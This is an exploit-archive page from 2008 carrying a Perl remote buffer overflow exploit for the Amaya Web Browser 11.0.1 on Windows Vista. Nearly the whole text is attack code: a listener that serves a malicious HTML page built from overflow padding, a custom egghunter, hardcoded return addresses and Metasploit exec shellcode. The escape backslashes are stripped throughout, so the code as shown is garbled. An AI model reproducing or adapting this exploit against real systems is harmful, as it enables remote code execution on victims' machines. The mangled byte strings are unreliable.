Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista)
# Published : 2008-12-28
# Author : SkD
# Previous Title : MS Internet Explorer XML Parsing Buffer Overflow Exploit
# Next Title : Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit
#!/usr/bin/perl
#
# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
# 		       (skd@abysssec.com  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# "Remember to connect to the webserver the link needs to end with .html, eg: http://127.0.0.1/s.html ("s" can be whatever) "
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!


use strict;
use warnings;
use IO::Socket;

my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47".
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38".
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48".
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c".
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58".
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44".
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38".
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33".
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a".
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b".
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53".
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57".
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39".
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46".
"x4ex46x43x36x42x50x5a";

# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("x58x58x40x40").("x47" x 4).("x42" x 6).     #inc edi
		  ("x42" x 24).("x42" x 24).("x39x07x75x8bx71x71").
                  ("x47x47x47x47x57xFFx65x78x77x76");
my $overflow = "x42" x 158;
my $overflow2 = "x42" x 4;
my $overflow3 = "x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "x44" x $overflow4len;
my $sled = "x42" x 12;
my $sled2 = "x41" x 24;
my $eip2 = "x37x55x03x10";  #10035537 call ecx, this won't be used
my $eip1 = "x30x4fx01x10"; #10014F30 call esi, this will be used.
my $heapaddr = "x50x0ex08x10";    #valid char for buffer, heap address
my $lookout = "x37x65x41x45" x 40;      # 45446537    look out values <-
my $lookout2 = "x37x65x41x45x41" x 4;      # 45446537                <-
my $lookout3 = "x37x65x41x45x41x41" x 4;      # 45446537            <-
my $lookout4 = "x37x65x41x45x41x41x41" x 4;      # 45446537        <-
my $additionaddr = "x35x65x41x45";    #used for an addition in the shellhunter  (+2)
my $nopsled = "x90x90x90x90x90x90";
my $jmp = "x75x0c";
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploitn";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)n";

while(1)
{
	my $sock=new IO::Socket::INET(Listen=>1,LocalAddr => $listenip,LocalPort=>$port_listen,Proto=>'tcp');
	die unless $sock;
	print "[x] Waiting for clients on port ".$port_listen."..n";
	my $s;
	while($s=$sock->accept()){
		print "[x] Got a client!n";
		my $request = <$s>;
		print $s "HTTP/1.0 200 OKnContent-Type: text/htmlnn";
		print "[x] Serving Exploit HTML page :)n";
		print $s "<html>n".
	 		 "<head><title>Welcome to SkD's world!</title></head>n".
         		 "<body>n".
         		 "<td nowrap=x22nowrap".
         		 $overflow.$jmp.$eip1.$additionaddr.$heapaddr.$overflow3.$shellhunter.$sled.
         		 $overflow4.
         		 "x22>n".
         		 "</td>n".
         		 "</body>n".
         		 "</html><title".$lookout4.$lookout3.$lookout2.$lookout.$sled2.$nopsled.$shellcode."></title>rn";
                sleep(0.5);
	        close $s;
		print "[x] Done!n";
	}
}

# www.Syue.com [2008-12-28]